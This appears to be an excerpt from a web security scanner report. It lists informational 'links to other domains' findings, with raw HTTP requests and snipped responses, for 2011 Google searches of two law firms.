http://webcache.googleusercontent.com/search?q=cache:ebrQrYdEB4IJ:www.butlerrubin.com/+Butler+Rubin+Saltarelli+%26+Boyd&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:hRJKLaPqU5MJ:www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm+Butler+Rubin+Saltarelli+%26+Boyd&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lMajwNrQlKIJ:www.linkedin.com/company/butler-rubin-saltarelli-%26-boyd+Butler+Rubin+Saltarelli+%26+Boyd&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:uBsZ3t4zbdEJ:www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US+Butler+Rubin+Saltarelli+%26+Boyd&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US
http://www.butlerrubin.com/
http://www.butlerrubin.com/web/br.nsf/attorneys
http://www.butlerrubin.com/web/br.nsf/br_work
http://www.butlerrubin.com/web/br.nsf/business_reorganization
http://www.butlerrubin.com/web/br.nsf/client_service
http://www.butlerrubin.com/web/br.nsf/community_service
http://www.butlerrubin.com/web/br.nsf/contact
http://www.butlerrubin.com/web/br.nsf/diversity
http://www.butlerrubin.com/web/br.nsf/executivestaff
http://www.butlerrubin.com/web/br.nsf/lateral_attorney_hiring
http://www.goldbergkohn.com/
http://www.greenandchesnut.com/
http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=IL0180
http://www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/
http://www.jenner.com/
http://www.kieslerberman.com/
http://www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html
http://www.linkedin.com/company/butler-rubin-saltarelli-&-boyd
http://www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm
http://www.youtube.com/results?q=Butler+Rubin+Saltarelli+%26+Boyd&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Butler+Rubin+Saltarelli+%26+Boyd&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:29 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81031

<!doctype html> <head> <title>Butler Rubin Saltarelli & Boyd - Google Search</title> <script>window.google={kEI:"nc_LTaXmKsHr0QHWr737Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,285
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Butler+Rubin+Saltarelli+%26+Boyd&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBwQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ebrQrYdEB4IJ:www.butlerrubin.com/+Butler+Rubin+Saltarelli+%26+Boyd&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:ebrQrYdEB4IJ:www.butlerrubin.com/+Butler+Rubin+Saltarelli+%26+Boyd&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CCEQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/attorneys" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoADAA')">Our people</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/contact" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoATAA')">Contact us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/lateral_attorney_hiring" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoAjAA')">Lateral attorney hiring</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/br_work" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoAzAA')">Working at butler rubin</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/executivestaff" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBDAA')">Executive staff</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/client_service" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoBTAA')">Client Service</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/diversity" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBjAA')">Diversity</a></div><div class=sld><a class=sla href="http://www.butlerrubin.com/web/br.nsf/community_service" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBzAA')">Our commitment</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/web/br.nsf/executivestaff" class=l onmousedown="return clk(this.href,'','','','2','','0CC0QFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2y_4oDCDL_EJ:www.butlerrubin.com/web/br.nsf/executivestaff+Butler+Rubin+Saltarelli+%26+Boyd&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:2y_4oDCDL_EJ:www.butlerrubin.com/web/br.nsf/executivestaff+Butler+Rubin+Saltarelli+%26+Boyd&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.butlerrubin.com/web/br.nsf/business_reorganization" class=l onmousedown="return clk(this.href,'','','','3','','0CDQQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CqE60lfUb_UJ:www.butlerrubin.com/web/br.nsf/business_reorganization+Butler+Rubin+Saltarelli+%26+Boyd&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:CqE60lfUb_UJ:www.butlerrubin.com/web/br.nsf/business_reorganization+Butler+Rubin+Saltarelli+%26+Boyd&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDkQIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CEIQoAIwBA')" title="Butler Rubin Saltarelli &amp; Boyd LLP" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CEIQoAIwBA')" title="Butler Rubin Saltarelli &amp; Boyd LLP"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQoAIwBQ')" title="Butler Rubin Saltarelli &amp; Boyd: Bond R Douglass" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.butlerrubin.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CEkQoAIwBQ')" title="Butler Rubin Saltarelli &amp; Boyd: Bond R Douglass"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Gl6Zr6yLZycJ:www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/+Butler+Rubin+Saltarelli+%26+Boyd&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Gl6Zr6yLZycJ:www.jdjournal.com/2010/08/09/butler-rubin-saltarelli-boyd-llp-hires-new-coo/+Butler+Rubin+Saltarelli+%26+Boyd&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US" class=l onmousedown="return clk(this.href,'','','','8','','0CFkQFjAH')">Best Lawyers - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uBsZ3t4zbdEJ:www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US+Butler+Rubin+Saltarelli+%26+Boyd&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uBsZ3t4zbdEJ:www.bestlawyers.com/firms/butler-rubin-saltarelli-boyd-llp/4278/US+Butler+Rubin+Saltarelli+%26+Boyd&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CF4QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/butler-rubin-saltarelli-&-boyd" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:lMajwNrQlKIJ:www.linkedin.com/company/butler-rubin-saltarelli-%26-boyd+Butler+Rubin+Saltarelli+%26+Boyd&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:lMajwNrQlKIJ:www.linkedin.com/company/butler-rubin-saltarelli-%26-boyd+Butler+Rubin+Saltarelli+%26+Boyd&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html" class=l onmousedown="return clk(this.href,'','','','10','','0CGUQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GznoZtMVhZ4J:www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:GznoZtMVhZ4J:www.lawyers.com/Illinois/Chicago/Butler-Rubin-Saltarelli-and-Boyd-LLP-913924-f.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGwQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm" class=l onmousedown="return clk(this.href,'','','','11','','0CG4QFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hRJKLaPqU5MJ:www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm+Butler+Rubin+Saltarelli+%26+Boyd&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hRJKLaPqU5MJ:www.martindale.com/Butler-Rubin-Saltarelli-Boyd-LLP/law-firm-756671.htm+Butler+Rubin+Saltarelli+%26+Boyd&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CHMQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html" class=l onmousedown="return clk(this.href,'','','','12','','0CHQQFjAL')">Bond, R Douglass - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SLJnUHXWGcUJ:chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:SLJnUHXWGcUJ:chicago.citysearch.com/profile/38426856/chicago_il/bond_r_douglass_butler_rubin_saltarelli_boyd.html+Butler+Rubin+Saltarelli+%26+Boyd&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','12','','0CHsQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.infirmation.com/shared/lss/one-payscale.tcl?employer_id=IL0180" class=l onmousedown="return clk(this.href,'','','','13','','0CHwQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ul5mXwUPl3UJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DIL0180+Butler+Rubin+Saltarelli+%26+Boyd&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ul5mXwUPl3UJ:www.infirmation.com/shared/lss/one-payscale.tcl%3Femployer_id%3DIL0180+Butler+Rubin+Saltarelli+%26+Boyd&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','13','','0CIEBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.goldbergkohn.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIQBEKIIMA0')">Goldberg Kohn</a>
...[SNIP]...
<div><a href="http://www.jenner.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIYBEKIIMA4')">Jenner & Block LLP</a>
...[SNIP]...
<div><a href="http://www.greenandchesnut.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIgBEKIIMA8')">greenandchesnut</a>
...[SNIP]...
<div><a href="http://www.kieslerberman.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CIoBEKIIMBA')">Kiesler & Berman Home</a>
...[SNIP]...

19.55. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman
http://investing.businessweek.com/research/stocks/snapshot/snapshot.asp?capId=1680186
http://pmstax.com/
http://upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP
http://webcache.googleusercontent.com/search?q=cache:AorIwNzxdOIJ:www.linkedin.com/company/pillsbury-winthrop-shaw-pittman+Pillsbury+Winthrop+Shaw+Pittman&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:LV9AgS4CwKMJ:pmstax.com/+Pillsbury+Winthrop+Shaw+Pittman&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NWDLC2TmklcJ:www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1+Pillsbury+Winthrop+Shaw+Pittman&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:i7OHqk31etIJ:upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP+Pillsbury+Winthrop+Shaw+Pittman&cd=13&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jshOjtS_4LoJ:www.nndb.com/company/229/000124854/+Pillsbury+Winthrop+Shaw+Pittman&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nKA2-ruJEfgJ:www.pillsburylaw.com/+Pillsbury+Winthrop+Shaw+Pittman&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:vvtaQHosgIwJ:en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman+Pillsbury+Winthrop+Shaw+Pittman&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.cooley.com/
http://www.linkedin.com/company/pillsbury-winthrop-shaw-pittman
http://www.mofo.com/
http://www.morganlewis.com/
http://www.nndb.com/company/229/000124854/
http://www.pillsburylaw.com/
http://www.pillsburylaw.com/index.cfm?pageID=11
http://www.pillsburylaw.com/index.cfm?pageID=13
http://www.pillsburylaw.com/index.cfm?pageID=25
http://www.pillsburylaw.com/index.cfm?pageID=3
http://www.pillsburylaw.com/index.cfm?pageID=53
http://www.pillsburylaw.com/index.cfm?pageID=80
http://www.pillsburylaw.com/index.cfm?pageid=17
http://www.pillsburylaw.com/index.cfm?pageid=5
http://www.proskauer.com/
http://www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1
http://www.youtube.com/results?q=Pillsbury+Winthrop+Shaw+Pittman&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:53 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81450

<!doctype html> <head> <title>Pillsbury Winthrop Shaw Pittman - Google Search</title> <script>window.google={kEI:"pdDLTcPzLuf00gG0h4HLBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Pillsbury+Winthrop+Shaw+Pittman&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nKA2-ruJEfgJ:www.pillsburylaw.com/+Pillsbury+Winthrop+Shaw+Pittman&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCcQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=13" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoADAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=3" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=80" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=11" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoAzAA')">Services</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=25" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBDAA')">Publications & Presentations</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=53" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBTAA')">What Sets Us Apart</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=17" onmousedown="return clk(this.href,'','','','1','','0CC8QqwMoBjAA')">News</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=5" onmousedown="return clk(this.href,'','','','1','','0CDAQqwMoBzAA')">Clients</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=13" class=l onmousedown="return clk(this.href,'','','','2','','0CDMQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=3" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CEAQIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman"><em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman" class=l onmousedown="return clk(this.href,'','','','7','','0CFsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vvtaQHosgIwJ:en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman+Pillsbury+Winthrop+Shaw+Pittman&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CGAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/pillsbury-winthrop-shaw-pittman" class=l onmousedown="return clk(this.href,'','','','8','','0CGIQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AorIwNzxdOIJ:www.linkedin.com/company/pillsbury-winthrop-shaw-pittman+Pillsbury+Winthrop+Shaw+Pittman&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nndb.com/company/229/000124854/" class=l onmousedown="return clk(this.href,'','','','9','','0CGgQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jshOjtS_4LoJ:www.nndb.com/company/229/000124854/+Pillsbury+Winthrop+Shaw+Pittman&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CG0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/snapshot/snapshot.asp?capId=1680186" class=l onmousedown="return clk(this.href,'','','','10','','0CG4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CHMQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pmstax.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LV9AgS4CwKMJ:pmstax.com/+Pillsbury+Winthrop+Shaw+Pittman&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHkQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1" class=l onmousedown="return clk(this.href,'','','','12','','0CHsQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NWDLC2TmklcJ:www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1+Pillsbury+Winthrop+Shaw+Pittman&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CIABECAwCw')">Cached</a>
